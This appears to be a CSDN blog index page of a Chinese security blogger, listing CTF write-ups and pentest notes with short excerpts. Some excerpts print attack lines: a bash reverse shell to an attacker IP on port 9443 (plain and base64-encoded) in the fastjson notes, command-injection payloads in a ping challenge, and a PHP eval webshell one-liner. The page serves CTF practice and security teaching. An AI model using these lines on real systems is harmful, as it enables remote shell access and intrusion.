自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Scorpio_m7

分享攻防世界题目,求关注

  • 博客(77)
  • 问答 (1)
  • 收藏
  • 关注

原创 2023春秋杯冬季赛wp

一天,当你正在监控公司的网络状况时,你突然发现了一些异常的现象,部分服务器无法访问,部分数据无法读取,同时你的安全设备产生了告警,截获了一段经过加密的流量。md中有一半的flag,图片给了加密的算法,并且看到CRC是相同的,就可以用明文攻击,使用archpr.exe,选择plain-text模式,encrypted zip file选择外卖箱,plain-text file path 选择key.zip,开始攻击后得到压缩包,解压后得到txt.galf。然后构造利用链,启动vps的http,启动监听。

2024-03-30 20:49:17 653

原创 攻防世界-wp-REVERSE-新手区-7-game

跳转到main_0函数,分析代码,当所有灯点亮时,进入sub_13F7AB4(),跳转到该函数。用IDA静态分析:在函数中搜索main,进入main函数,按F5进行反汇编。打开发现是一个游戏,直接输入12345678就能直接拿到flag。分析代码,发现是创建了两个长度为57的字符串,并进行运算。把sub_13F7AB4()函数翻译成python脚本就是。菜鸡最近迷上了玩游戏,但它总是赢不了,你可以帮他获胜吗。main函数反编译,分析代码逻辑,构造脚本。这是关键的输出flag的函数。

2023-04-14 17:30:01 429 1

原创 linux的shell基本机制

Linuxshell的基本机制

2023-04-14 17:10:15 158

原创 php代码审计

php代码审计相关

2023-02-10 20:07:32 1502

原创 攻防世界-wp-MOBILE-新手区-5-基础android

攻防世界-wp-MOBILE-新手区-5-基础android

2023-02-10 15:32:28 173

原创 未授权访问总结

🌕写在前面🍊博客主页:Scorpio_m7,github🎉欢迎关注🔎点赞👍收藏⭐️留言📝🌟本文由 Scorpio_m7原创,CSDN首发!📆首发时间:🌹2022年4月7日🌹✉️坚持和努力一定能换来诗与远方!🙏作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录🌕写在前面Redis未授权访问靶机安装redis利用redis写webshell写入公私钥用私钥登录利用crontab反弹shell防护方法redis主从复制RCE环境搭建漏洞利用漏洞修复Weblogic未授权访.

2022-04-07 21:58:39 4593

原创 后渗透流量加密

????写在前面????博客主页:Scorpio_m7,github????欢迎关注????点赞????收藏⭐️留言????????本文由 Scorpio_m7原创,CSDN首发!????首发时间:????2022年2月9日????✉️坚持和努力一定能换来诗与远方!????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录????写在前面前言未加密OpenSSLnetcat流量加密Metasploit流量加密OpenSSL创建证书impersonate_ssl模块使用

2022-02-14 13:40:09 4578 1

原创 nacos漏洞复现

????写在前面????博客主页:Scorpio_m7,github????欢迎关注????点赞????收藏⭐️留言????????本文由 Scorpio_m7原创,CSDN首发!????首发时间:????2022年2月9日????✉️坚持和努力一定能换来诗与远方!????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录????写在前面概述环境搭建Linuxwindows漏洞复现信息泄露任意用户创建使用Spring Boot获得账号及密码关键信息后台未授权登录概述

2022-02-09 19:38:31 9415 2

原创 近源渗透测试

????写在前面????博客主页:Scorpio_m7????欢迎关注????点赞????收藏⭐️留言????????本文由 Scorpio_m7原创,CSDN首发!????首发时间:????2022年1月28日????✉️坚持和努力一定能换来诗与远方!????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录????写在前面wifi渗透Wifi密码爆破WIFI钓鱼无线路由器漏洞利用badusb工具准备安装 arduino 的 IDE驱动安装配置环境CobaltStr

2022-01-28 21:20:07 3827

原创 CS免杀上线方式

????写在前面????博客主页:Scorpio_m7????欢迎关注????点赞????收藏⭐️留言????????本文由 Scorpio_m7原创,CSDN首发!????首发时间:????2022年1月28日????✉️坚持和努力一定能换来诗与远方!????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!文章目录????写在前面WmicmshtaMSBUILDregsvr32POWSHELLRGB隐写上线Wmicwmic是一款Microsoft工具,它提供一个wmi

2022-01-28 21:04:34 3610

原创 安卓应用hook测试

安卓应用渗透测试

2021-12-29 18:28:11 4284

原创 域渗透总结

域渗透基础

2021-12-02 13:54:34 3384

原创 攻防世界-wp-WEB-新手区-11-command_execution

题目来源:Cyberpeace-n3k0题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。题目场景:111.200.241.244:59379题目思路:可以通过&执行多条命令造成命令执行漏洞解题过程:这里先127.0.0.1 & find / -name “flag.*” 来查找flag文件的位置然后看下图可以发现找到了,在/home/flag.txt然后cat 文件得到flag127.0.0.1 & cat /h

2021-11-29 14:14:16 2430

原创 常规免杀思路

常规免杀思路静态查杀模糊哈希算法又叫基于内容分割的分片分片哈希算法(context triggered piecewise hashing, CTPH),主要用于文件的相似性比较。大致就可以理解为,不要把一个文件的所有内容都拿来计算hash,而通过分片,取出部分重要(不易改变)的内容进行hash计算,这样就能达到通过一个特征码找到类似的病毒变种。手工修改无源码数据方面字符串,如果不影响程序逻辑,可以替换大小写;无关紧要的数据,随意替换;整数,如果不影响结果,替换值,清零等操作。地址,基本

2021-11-10 21:04:23 399

原创 SSTI+python沙箱逃逸

SSTI(Server-Side Template Injection)服务器接受了用户的输入,过滤不严谨,将用户输入作为web应用模板的一部分,但是在通过模板引擎进行渲染的过程中,执行了用户输入的恶意代码,造成命令执行沙箱逃逸在代码执行的环境下,脱离过滤和限制,最终拿到shell权限的过程。模板引擎为了使用户界面与业务数据分离而产生,可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档flask-jinja2flask使用jinja2作为框架的模板系统。jinja2是基于

2021-10-02 16:17:49 2363

原创 内网端口转发

EarthWorm内网穿透正向socks5服务器当目标网络边界存在公网IP且可任意开监听端口./ew_linux_x64 -s ssocksd -l 1080可在该目标机器上开启一个8888的正向连接,然后其他主机可通过SwitchyOmega设置socks5代理为目标主机ip:1080 ,添加这个代理就可以使用了反向socks5服务器服务器(外网vps)./ew_linux_x64 -s rcsocks -l 1080 -e 5555解释:把1080端口收到的请求转发给5555端口。

2021-09-26 18:06:33 1710

原创 web安全

web中的常见漏洞注入漏洞SQL注入命令注入代码注入表达式注入XML外部实体注入文件相关本地/远程文件包含任意文件上传任意文件下载/读取信息泄露.svn/.git源代码泄露配置文件、测试文件应用接口暴露备份文件泄露代码托管平台源码泄露业务逻辑安全用户弱口令用户名/密码枚举越权漏洞未授权访问验证码缺陷短信轰炸中间件缺陷jboss反序列化tomcat文件包含weblogic反序列化服务器安全永恒之蓝(MS17-010)操作系统弱口

2021-09-03 14:57:45 1005 1

原创 攻防世界-wp-MOBILE-新手区-4-app1

题目附件:b9af8dfef6b749d2819ef5be16c26a0d.apk题目思路:通过jeb将apk反编译,找到关键判断进行分析解题过程:首先我们使用老套路,用jeb或者dex2jar反编译后用jd-gui打开,并且查看java源码,在apk下bytecode中的MainActivity找到主类,右键decompilepackage com.example.yaphetshan.tencentgreat;import android.content.pm.PackageInfo;i

2021-08-20 15:22:06 236

原创 攻防世界-wp-REVERSE-新手区-6-getit

题目来源:SharifCTF 2016题目描述:菜鸡发现这个程序偷偷摸摸在自己的机器上搞事情,它决定一探究竟题目附件:e3dd9674429f4ce1a25c08ea799fc027题目思路:动态调试,结合反编译代码找到flag解题过程:在010Editor 中打开该文件,看到magic number 是ELF,说明是Linux 下的可执行文件。放到ida64中,f5反编译,程序大概是把生成的flag,写入文件,放在/tmp/flag.txt 中,但最后又remove 了这个文件。int

2021-08-20 14:00:27 211

原创 攻防世界-wp-CRYPTO-新手区-9-easychallenge

题目来源:NJUPT_CTF题目描述:你们走到了一个冷冷清清的谜题前面,小鱼看着题目给的信息束手无策,丈二和尚摸不着头脑 ,你嘿嘿一笑,拿出来了你随身带着的笔记本电脑,噼里啪啦的敲起来了键盘,清晰的函数逻辑和流程出现在 了电脑屏幕上,你敲敲键盘,更改了几处地方,运行以后答案变出现在了电脑屏幕上。题目附件:42aa1a89e3ae48c38e8b713051557020.pyc](https://adworld.xctf.org.cn/media/task/attachments/42aa1a8

2021-08-20 13:08:26 1131 1

原创 攻防世界-wp-WEB-新手区-10-webshell

题目来源:Cyberpeace-n3k0题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。题目场景:111.200.241.244:59374题目思路:考查webshell连接工具的使用解题过程:题目描述中提示了一句话木马是index.php,访问网页ip:端口/index.php,看到一句话是<?php @eval($_POST['shell']);?> ,密码是shell,菜刀或者蚁剑连接,文件管理就可以看到flag了cyberpeace

2021-08-20 12:50:40 1043 1

原创 fastjson-复现笔记

vulhub:找到fastjson1.2.47rcedocker-compose up -dnc -lvp 9443attacker反弹shellbash -i >& /dev/tcp/192.168.211.129/9443 0>&1加密bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMS4xMjkvOTQ0MyAwPiYx}|{base64,-d}|{bash,-i}最后的ip是apache服

2021-08-17 19:13:59 209

原创 Micropoor笔记

windows提权systeminfo>windowsvul.txt&(for %i in (KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780)do @type windowsvul.txt|@find /i "%i"||@echo %i you can fuck)

2021-08-17 18:58:04 170

原创 攻防世界-wp-CRYPTO-新手区-8-easy_RSA

题目来源:poxlove3题目描述:解答出来了上一个题目的你现在可是春风得意,你们走向了下一个题目所处的地方 你一看这个题目傻眼了,这明明是一个数学题啊!!!可是你的数学并不好。扭头看向小鱼,小鱼哈哈一笑 ,让你在学校里面不好好听讲现在傻眼了吧~来我来!三下五除二,小鱼便把这个题目轻轻松松的搞定了。flag格式为cyberpeace{小写的你解出的答案}题目附件:bca4e67e266a4040bbf560751c2f646a.txt题目思路:附件下载时文本文档内容是在一次RSA密钥对生

2021-07-19 17:02:30 469

原创 攻防世界-wp-WEB-新手区-9-xff_referer

题目来源:Cyberpeace-n3k0题目描述:X老师告诉小宁其实xff和referer是可以伪造的。题目场景:111.200.241.244:56031题目思路:本题是考察的HTTP头的伪装修改X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来

2021-07-19 16:44:17 337

原创 渗透测试-Z宝典(Penetration-Zbook)

内容大纲:01-攻击流程01-攻击路径02-信息收集-IP资源02-信息收集-域名发现02-信息收集-服务器与人力资源情报收集02-信息收集-网站关键信息收集03-漏洞分析-Web漏洞扫描03-漏洞分析-弱口令扫描03-漏洞分析-漏洞研究03-漏洞分析-系统漏洞扫描04-web渗透测试-CMS漏洞04-web渗透测试-Web TOP 10漏洞04-web渗透测试-框架漏洞04-web渗透测试-绕过Web防火墙05-权限提升-linux提权05-权限提升-Windows系统提权

2021-06-29 17:51:26 179

原创 攻防世界-wp-REVERSE-新手区-5-python-trade

题目来源:NJUPT CTF 2017题目描述:菜鸡和菜猫进行了一场Py交易题目附件:f417c0d03b0344eb9969ed0e1f772091.pyc题目思路:在线python反编译,根据文件的运算逻辑进行逆向解题过程:python是先编译再解释型语言。pyc后缀的文件是python编译产生的中间文件。python解释器由一个编译器和一个虚拟机构成,python.exe先将源码编译成字节码(即将.py 文件换转成.pyc 文件),.pyc不是二进制码,而是py文件编译后生成的字节码

2021-06-28 16:04:57 203

原创 攻防世界-wp-WEB-新手区-8-get_post

题目来源:Cyberpeace-n3k0题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?题目场景:111.200.241.244:56032题目思路:按着提示来就能拿flag,get方式就在网址框输入?a=1,post方式就用hackbar的post data模块解题过程:或者使用python代码import requestsurl='http://111.200.241.244:56032/?a=1'#get请求payload=dict(b='2')#

2021-06-28 15:56:25 282

原创 攻防世界-wp-CRYPTO-新手区-7-Railfence

题目来源:poxlove3题目描述:被小鱼一连将了两军,你心里更加不服气了。两个人一起继续往前走, 一路上杂耍卖艺的很多,但是你俩毫无兴趣,直直的就冲着下一个谜题的地方去了。 到了一看,这个谜面看起来就已经有点像答案了样子了,旁边还画着一张画,是一副农家小院的 图画,上面画着一个农妇在栅栏里面喂5只小鸡,你嘿嘿一笑对着小鱼说这次可是我先找到答案了。题目附件:c5eb188a4e514ddc9ceaed3ed1296ce3.txt题目思路:附件下载时文本文档内容是:ccehgyaefnpeo

2021-06-28 15:07:42 148

原创 攻防世界-wp-WEB-新手区-7-simple_php

题目来源:Cyberpeace-n3k0题目描述:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。题目场景:111.200.241.244:59184题目思路:题目为simple_php,根据题目信息,判断是关于php代码审计的解题过程:打开题目,得到一串php代码<?phpshow_source(__FILE__);include("config.php");$a=@$_GET['a'];$b=@$_GET['b'];if($a==0 and $a){

2021-06-22 18:06:53 194 3

原创 攻防世界-wp-MOBILE-新手区-3-easy-apk

题目附件:989ca07c3f90426fa05406e4369901ff.apk题目思路:通过jeb将apk反编译,找到密钥加密函数进行分析,按照自定义映射字符base64解码即可。解题过程:首先我们使用老套路,用jeb或者dex2jar反编译后用jd-gui打开,并且查看java源码,在apk下bytecode中的MainActivity找到主类,右键decompilepublic class MainActivity extends AppCompatActivity { publ

2021-06-22 17:05:17 387

原创 Linux文件和目录的权限

三级权限存在的问题系统中任一个用户,要么对文件的全部内容具有访问权,要么不可访问文件。有的情况下,很不方便,例如用户修改口令文件/etc/passwd和/etc/shadow策略和机制相分离(SUID权限)文件list.txt的文件主liu给文件query增加SUID权限root@kali:~/#chmod u+s queryroot@kali:~/#ls -l query-rws--x--x 1 liu leader 1234 Dec 10 23:22 query一般情况下,进程的实际UI

2021-06-19 23:36:45 126

原创 应急响应技能

文章目录01-应急响应基础技能及常见工具使用01-应急响应概述01-应急类型02-应急方法论03-应急响应阶段04-应急排查点/应对方案02-windows应急响应01-系统信息-基本信息02-系统信息-用户信息03-系统信息-启动项04-计划任务05-文件痕迹排查06-进程排查07-日志分析03- Linux应急响应04- 常用工具05-总结01-应急响应基础技能及常见工具使用01-应急响应概述01-应急类型勒索挖矿网站被黑APT攻击非法劫持数据泄露钓鱼邮件02-应急方法论[外

2021-06-02 18:32:37 1818 1

原创 攻防世界-wp-REVERSE-新手区-4-open-source

题目来源:HackYou CTF题目描述:菜鸡学逆向学得头皮发麻,终于它拿到了一段源代码题目附件:8b6405c25fe447fa804c6833a0d72808.c题目思路:对源码分析解题过程:查看源码,先看第一段unsigned int first=atoi(argv[1]);if(first!=0xcafe){ printf("youarewrong,sorry.\n"); exit(2);}得出first=0xcafe转换成10进值为51966unsig

2021-05-20 22:23:10 253 1

原创 iOS应用程序安全风险及漏洞解析

基础介绍iOS 系统介绍移动操作系统基于在 XNU 内核, Darwin OSiOS 是闭源操作系统使用 OC 与 Swift 作为开发语言构建在 Cocoa Touch APIiOS 应用沙盒基于 TrustedBSD MAC 强制访问框架第三方应用程序运行在 mobile 用户权限下只有系统应用以 root 用户运行应用程序只能访问自己的文件和数据IPC 通信被限制Jailbreak不完美越狱:设备重启后,之前的越狱状态会失效,需要手动重新越狱完美越狱:越狱后设备重

2021-05-18 11:55:31 2807 4

原创 Android安全测试

基础介绍Android 平台、组件等基础知识介绍Android平台架构Android系统 架构采用分层式设计。 如果把Android 系统看做一层一层的,那么基本可以理解成以下结构(这是其中一种简单的分层方式):最上层是应用层( Application 层),包含所有应用 ,比如桌面 (桌面 也是应用)、电话、 设置等,以及我们常用的微信、优酷等应用属于这一层第二层是应用框架层Framework 层),包含了对上层应用的管理和提供开发者所需的应用程序编程接口( API )。第三层是系统运行库层

2021-05-17 19:08:02 996 3

原创 攻防世界-wp-MOBILE-新手区-2-app3

题目附件:399649a0e89b46309dd5ae78ff96917a.ab题目思路:通过android-backup-extractor将 .ab 文件转换为 .tar 文件,然后将apk反编译,找到密钥加密函数进行逆向解密分析,获取到密钥后,使用sqlitebrowser打开加密数据库,解密base64数据即可。解题过程:.ab 后缀名的文件是 Android 系统的备份文件格式,它分为加密和未加密两种类型,.ab 文件的前 24 个字节是类似文件头的东西,如果是加密的,在前 24 个字节

2021-05-08 21:48:39 263

原创 攻防世界-wp-MOBILE-新手区-1-RememberOther

题目附件:476d9022bb0449c09c0b1e24f0686b66.zip题目思路:jeb打开查看源码,找到字符串列表,解密md5,结合word提示解题过程:用jeb打开,找到源代码.com.droider.crackme0201.MainActivitypublic boolean checkSN(String userName, String sn) {//前面31行调用此函数 try { if (userName.length() == 0 &&am

2021-05-08 21:37:16 621 2

原创 攻防世界-wp-CRYPTO-新手区-6-幂数加密

题目来源:CFF2016题目描述:你和小鱼终于走到了最后的一个谜题所在的地方,上面写着一段话“亲爱的朋友, 很开心你对网络安全有这么大的兴趣,希望你一直坚持下去,不要放弃 ,学到一些知识, 走进广阔的安全大世界”,你和小鱼接过谜题,开始了耐心细致的解答。flag为cyberpeace{你解答出的八位大写字母}题目附件:4b98e01157804f508eb7fc1fd1708051.txt题目思路:01248密码,又称云影密码,与二进制幂加密不同,这个加密法采用的是0作间隔,其他非0数隔开后组

2021-05-07 10:41:10 181 2

原创 攻防世界-wp-REVERSE-新手区-3-logmein

题目来源:RC3 CTF 2016题目描述:菜鸡开始接触一些基本的算法逆向了题目附件:a7554d316da840d3a381e4e8348201e9题目思路:逆向程序,找到关键位置,对算法进行逆向即可得到flag解题过程:拿到程序后,我们首先查壳和程序的详细信息发现是64位的ELF文件,载入IDA64,找到main函数,F5反编译得到伪C代码。void __fastcall __noreturn main(__int64 a1, char **a2, char **a3){ s

2021-04-29 16:06:16 251 3

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除